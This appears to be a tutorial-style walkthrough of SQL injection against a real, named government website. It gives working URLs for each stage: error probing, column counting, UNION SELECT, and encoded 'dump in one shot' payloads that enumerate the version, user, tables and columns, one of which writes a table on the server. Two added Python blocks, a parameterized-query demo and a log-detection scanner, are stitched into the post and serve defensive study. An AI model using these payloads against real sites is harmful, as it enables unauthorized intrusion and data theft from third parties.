First of all, hello guys :D. Hope you all are fine. Today I'm going to show you the solution to my SQLi Challenge 4, which is based on MSSQLi.
First, the challenge rules/tasks.
Target is dlc2.academy.gov.ua and we have to print Cyber Name, Version, DB, User, Tables and Columns.
Now follow me :D
1. We'll find the injection point. As you know, .asp and .aspx extensions are common in MSSQLi.
So now it's time to use dorks :p
site:dlc2.academy.gov.ua inurl:.asp?id=
First result: http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}
2. Now we'll check whether it's vulnerable and try to balance the query.
Putting a single quote:
http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}'
:D yeah, it's showing an error.
Now we'll try to balance the query by using comments.
http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}-- - > No Error
http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}'-- - > No Error
No error when the single quote is followed by a comment, which means :D the site is string based.
3. Now we'll find the total number of columns.
http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}' order by 5-- - > Error
http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}' order by 3-- - > No Error
http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}' order by 4-- - > No Error
:D so the total number of columns is 4.
4. Now we'll use UNION SELECT.
http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}' union select 1,2,3,4-- - > Error
:3 As always, the int problem: the integer literals don't match the types of the original columns.
Now we'll convert all of them to null.
http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}' union select null,null,null,null-- - > No Error
-_- As I said.
Now we'll convert them to int one by one.
http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}' union select null,null,null,4-- - > No Error
And now it's showing the vulnerable column, "4" :D Hurray! <3
5. Now it's time for DIOS.
For detailed MSSQLi, visit securityidiots.com
Now I'm going to use the DIOS of master Zen <3
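Added example, not from the original post: a Python/sqlite3 stand-in for the crsprops.asp lookup that contrasts the string-concatenated query implied by steps 2 to 4 with a hardened version. The table, column names and the probe() helper are constructed for this example, and sqlite3 stands in for MSSQL only so it runs offline; the same probes give the same error/no-error oracle against the concatenated query and nothing at all against the validated, parameterized one.

```python
import re
import sqlite3

# Constructed stand-in for the crsprops.asp backend: four columns, one row,
# keyed by the Id value from the page. sqlite3 replaces MSSQL only so the
# example runs offline; the probe outcomes give the same kind of oracle.
SAMPLE_ID = "{F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}"

def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE courses (id TEXT, title TEXT, descr TEXT, num INTEGER)")
    con.execute("INSERT INTO courses VALUES (?, 'Course A', 'Intro', 1)", (SAMPLE_ID,))
    return con

def lookup_vulnerable(con, raw_id):
    """String concatenation, the pattern the page's probes imply: a quote in
    the Id ends the literal, so everything after it is parsed as SQL."""
    sql = f"SELECT id, title, descr, num FROM courses WHERE id = '{raw_id}'"
    return con.execute(sql).fetchall()

# The Id is a braced GUID; anything else is rejected before touching the DB.
GUID_RE = re.compile(r"^\{[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\}$")

def lookup_hardened(con, raw_id):
    """Two independent defences: a strict format check on the Id and a bound
    parameter, so the value can never alter the statement's structure."""
    if not GUID_RE.match(raw_id):
        return []
    return con.execute("SELECT id, title, descr, num FROM courses WHERE id = ?",
                       (raw_id,)).fetchall()

def probe(fn, con, raw_id):
    """Reproduce the page's error / no-error oracle: 'error' if the statement
    fails to parse or run, otherwise the number of rows returned."""
    try:
        return len(fn(con, raw_id))
    except sqlite3.Error:
        return "error"

if __name__ == "__main__":
    con = make_db()
    for payload in (SAMPLE_ID, SAMPLE_ID + "'", SAMPLE_ID + "' order by 5-- -",
                    SAMPLE_ID + "' order by 4-- -",
                    SAMPLE_ID + "' union select null,null,null,4-- -"):
        # payload[38:] is the part appended after the 38-character braced GUID
        print(f"{payload[38:]!r:>40}  vulnerable={probe(lookup_vulnerable, con, payload)}"
              f"  hardened={probe(lookup_hardened, con, payload)}")
```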
;BEGIN%20DECLARE%20@data%20VARCHAR%288000%29,%20@counter%20int,%20@tblName%20VARCHAR%2850%29,%20@colNames%20VARCHAR%28100%29%20DECLARE%20@tmpTbl%20TABLE%20%28name%20VARCHAR%288000%29%20NOT%20NULL%29%20SET%20@counter%20=%201%20SET%20@data=%27a%27%2bchar%2810%29%2b%27Injected%20by%20Zen%20::%20%27%2b%27char%2810%29%27%2b@@version%2b%27Database%20::%20%27%2bdb_name%28%29%2bchar%2810%29%2bchar%2810%29%20SET%20@tblName%20=%20%27%27%20SET%20@colNames%20=%20%27%27%20WHILE%20@counter%3C=%28SELECT%20COUNT%28table_name%29%20FROM%20INFORMATION_SCHEMA.TABLES%29%20BEGIN%20SET%20@colNames%20=%20%27%27%20SELECT%20@tblName%20=%20table_name%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20TABLE_NAME%20NOT%20IN%20%28select%20name%20from%20@tmpTbl%29%20SELECT%20@colNames%20=%20@colNames%20%2b%27%20:%20%27%2bcolumn_name%20%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20TABLE_NAME%20=%20@tblName%20INSERT%20@tmpTbl%20VALUES%28@tblName%29%20SET%20@data=@data%2b%27Table%20:%20%27%2b@tblName%2bchar%2810%29%2b%27Columns%20:%27%2b@colNames%2bchar%2810%29%20SET%20@counter%20=%20@counter%20%2b%201%20END%20SELECT%20@data%20AS%20output%20INTO%20err_dios%20END--
:p Let me make some changes: adding new lines and the user.
;BEGIN%20DECLARE%20@data%20VARCHAR%288000%29,%20@counter%20int,%20@tblName%20VARCHAR%2850%29,%20@colNames%20VARCHAR%28100%29%20DECLARE%20@tmpTbl%20TABLE%20%28name%20VARCHAR%288000%29%20NOT%20NULL%29%20SET%20@counter%20=%201%20SET%20@data=%2bchar%2810%29%2b%27Injected%20by%20D4RK%204NG31%27%2b%27<%27%2b%27br%27%2b%27>%27%2bchar%2810%29%2b%2bchar%2810%29%2b%27<%27%2b%27br%27%2b%27>%27%2b%27Version%20::%20%27%2b@@version%2bchar%2810%29%2b%27<%27%2b%27br%27%2b%27>%27%2b%27Database%20::%20%27%2bdb_name%28%29%2bchar%2810%29%2b%2bchar%2810%29%2b%27<%27%2b%27br%27%2b%27>%27%2b%27User%20::%20%27%2bcurrent_user%2b%27<%27%2b%27br%27%2b%27>%27%2b%2b%27<%27%2b%27br%27%2b%27>%27%2bchar%2810%29%2b%2bchar%2810%29%2bchar%2810%29%20SET%20@tblName%20=%20%27%27%20SET%20@colNames%20=%20%27%27%20WHILE%20@counter%3C=%28SELECT%20COUNT%28table_name%29%20FROM%20INFORMATION_SCHEMA.TABLES%29%20BEGIN%20SET%20@colNames%20=%20%27%27%20SELECT%20@tblName%20=%20table_name%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20TABLE_NAME%20NOT%20IN%20%28select%20name%20from%20@tmpTbl%29%20SELECT%20@colNames%20=%20@colNames%20%2b%27%20:%20%27%2bcolumn_name%20%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20TABLE_NAME%20=%20@tblName%20INSERT%20@tmpTbl%20VALUES%28@tblName%29%20SET%20@data=@data%2b%27Table%20:%20%27%2b@tblName%2b%27<%27%2b%27br%27%2b%27>%27%2b%27Columns%20:%27%2b@colNames%2b%27<%27%2b%27br%27%2b%27>%27%2b%27<%27%2b%27br%27%2b%27>%27%2bchar%2810%29%20SET%20@counter%20=%20@counter%20%2b%201%20END%20SELECT%20@data%20AS%20output%20INTO%20dark_challenge_solution%20END-- -
:D Done.
Now it's time to inject our DIOS.
http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}';BEGIN%20DECLARE%20@data%20VARCHAR%288000%29,%20@counter%20int,%20@tblName%20VARCHAR%2850%29,%20@colNames%20VARCHAR%28100%29%20DECLARE%20@tmpTbl%20TABLE%20%28name%20VARCHAR%288000%29%20NOT%20NULL%29%20SET%20@counter%20=%201%20SET%20@data=%2bchar%2810%29%2b%27Injected%20by%20D4RK%204NG31%27%2b%27<%27%2b%27br%27%2b%27>%27%2bchar%2810%29%2b%2bchar%2810%29%2b%27<%27%2b%27br%27%2b%27>%27%2b%27Version%20::%20%27%2b@@version%2bchar%2810%29%2b%27<%27%2b%27br%27%2b%27>%27%2b%27Database%20::%20%27%2bdb_name%28%29%2bchar%2810%29%2b%2bchar%2810%29%2b%27<%27%2b%27br%27%2b%27>%27%2b%27User%20::%20%27%2bcurrent_user%2b%27<%27%2b%27br%27%2b%27>%27%2b%2b%27<%27%2b%27br%27%2b%27>%27%2bchar%2810%29%2b%2bchar%2810%29%2bchar%2810%29%20SET%20@tblName%20=%20%27%27%20SET%20@colNames%20=%20%27%27%20WHILE%20@counter%3C=%28SELECT%20COUNT%28table_name%29%20FROM%20INFORMATION_SCHEMA.TABLES%29%20BEGIN%20SET%20@colNames%20=%20%27%27%20SELECT%20@tblName%20=%20table_name%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20TABLE_NAME%20NOT%20IN%20%28select%20name%20from%20@tmpTbl%29%20SELECT%20@colNames%20=%20@colNames%20%2b%27%20:%20%27%2bcolumn_name%20%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20TABLE_NAME%20=%20@tblName%20INSERT%20@tmpTbl%20VALUES%28@tblName%29%20SET%20@data=@data%2b%27Table%20:%20%27%2b@tblName%2b%27<%27%2b%27br%27%2b%27>%27%2b%27Columns%20:%27%2b@colNames%2b%27<%27%2b%27br%27%2b%27>%27%2b%27<%27%2b%27br%27%2b%27>%27%2bchar%2810%29%20SET%20@counter%20=%20@counter%20%2b%201%20END%20SELECT%20@data%20AS%20output%20INTO%20dark_challenge_solution%20END-- -
Injected ;)
Now we have to dump our DIOS output.
http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}' union select null,null,null,(select output from dark_challenge_solution)-- -
:o WTF??? The DIOS was not injected successfully >:(
-_- Now we have to inject the site with a manual DIOS.
For this I'll use this DIOS, thanks to Foysal Hossain (Root X Force) :D
'Injected by D4RK 4NG31'%2b'<'%2b'br>'%2b'<'%2b'br>'%2b'Version :: '%2b@@version%2b'<'%2b'br>'%2b%2b'Database :: '%2bdb_name()%2b%2b'<'%2b'br>'%2b'User :: '%2buser%2b%2b'<'%2b'br>'%2b%2b'<'%2b'br>'%2b(select+char(10)%2b'<'%2b'br>'%2btable_name%2b'::'%2bcolumn_name from information_schema.columns FOR+XML+PATH(''))
Putting the DIOS into the site and injecting:
http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}' union select null,null,null,'Injected by D4RK 4NG31'%2b'<'%2b'br>'%2b'<'%2b'br>'%2b'Version :: '%2b@@version%2b'<'%2b'br>'%2b%2b'Database :: '%2bdb_name()%2b%2b'<'%2b'br>'%2b'User :: '%2buser%2b%2b'<'%2b'br>'%2b%2b'<'%2b'br>'%2b(select+char(10)%2b'<'%2b'br>'%2btable_name%2b'::'%2bcolumn_name from information_schema.columns FOR+XML+PATH(''))-- -
o.O Why isn't it showing? :3 Oh, we have to add "and 1=0" so the original query returns no row and the page displays our UNION row instead.
http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}' and 1=0 union select null,null,null,'Injected by D4RK 4NG31'%2b'<'%2b'br>'%2b'<'%2b'br>'%2b'Version :: '%2b@@version%2b'<'%2b'br>'%2b%2b'Database :: '%2bdb_name()%2b%2b'<'%2b'br>'%2b'User :: '%2buser%2b%2b'<'%2b'br>'%2b%2b'<'%2b'br>'%2b(select+char(10)%2b'<'%2b'br>'%2btable_name%2b'::'%2bcolumn_name from information_schema.columns FOR+XML+PATH(''))-- -
B| Done, site injected successfully.
Hope you like my tutorial of my challenge solution :D. Thanks for watching.
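Added example, not from the original post: a Python scanner that turns the probe sequence shown above (steps 2 to 5) into detection signatures and runs them over a constructed IIS-style log. The log lines, field layout and signature names are assumptions made for this example; its point is that the query string must be URL-decoded before matching, because the DIOS payloads above are almost entirely percent-encoded and a raw-text match on "union select" or "information_schema" would miss them.

```python
import re
from urllib.parse import quote, unquote_plus
# Signatures derived from this page's probe sequence (names invented for the example).
SIGNATURES = {
    "trailing-quote":  r"'$",                                  # step 2: bare quote
    "order-by-probe":  r"\border\s+by\s+\d+",                  # step 3: column count
    "union-select":    r"\bunion\s+select\b",                  # step 4: column probe
    "stacked-batch":   r";\s*begin\s+declare\b",               # step 5: stored DIOS batch
    "select-into":     r"\bselect\s+@\w+\s+as\s+\w+\s+into\s+\w+",   # writes a new table
    "schema-enum":     r"\binformation_schema\.(?:tables|columns)\b",
    "for-xml-path":    r"\bfor\s+xml\s+path\s*\(\s*''\s*\)",   # row concatenation
    "false-predicate": r"\band\s+1\s*=\s*0\b",                 # suppress the real row
}
SIG_RE = {name: re.compile(pat, re.I) for name, pat in SIGNATURES.items()}

def decode_query(raw):
    """IIS logs the query string as sent, so the DIOS arrives almost entirely as
    %xx; '+' is a space, while the page's literal plus signs are sent as %2b."""
    return re.sub(r"\s+", " ", unquote_plus(raw))

def classify(query):
    """Names of the signatures that fire on one query string, in SIGNATURES order."""
    decoded = decode_query(query)
    return [name for name, rx in SIG_RE.items() if rx.search(decoded)]

def scan_log(text):
    """Parse constructed W3C-style lines 'time method stem query status' and
    return (time, status, hits) for each request that fires a signature."""
    findings = []
    for line in text.splitlines():
        if line and not line.startswith("#"):
            time, _method, _stem, query, status = line.split(" ", 4)
            if hits := classify(query):
                findings.append((time, int(status), hits))
    return findings
# Constructed log built from the page's own probe strings (DIOS batch abbreviated),
# percent-encoded the way a browser sends them so the decode step is exercised.
GUID = "{F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}"
SAFE = "{}=,()@;"   # characters left unencoded, mirroring the URLs on the page
PROBES = [
    ("12:00:01", GUID, 200),
    ("12:00:05", GUID + "'", 500),
    ("12:00:09", GUID + "' order by 5-- -", 500),
    ("12:00:14", GUID + "' union select null,null,null,4-- -", 200),
    ("12:00:30", GUID + "';BEGIN DECLARE @data VARCHAR(8000) SET @data=@@version "
                 "SELECT @data AS output INTO dark_challenge_solution END-- -", 200),
    ("12:00:45", GUID + "' and 1=0 union select null,null,null,(select table_name "
                 "from information_schema.columns FOR XML PATH(''))-- -", 200),
]
SAMPLE_LOG = "#Fields: time cs-method cs-uri-stem cs-uri-query sc-status\n" + "\n".join(
    f"{t} GET /client/crsprops.asp Id={quote(p, safe=SAFE)} {s}" for t, p, s in PROBES)
```

Run stand-alone, `scan_log(SAMPLE_LOG)` flags every request after the first; in a real deployment the 500 responses on the first probes are the earliest signal, before any data leaves the database.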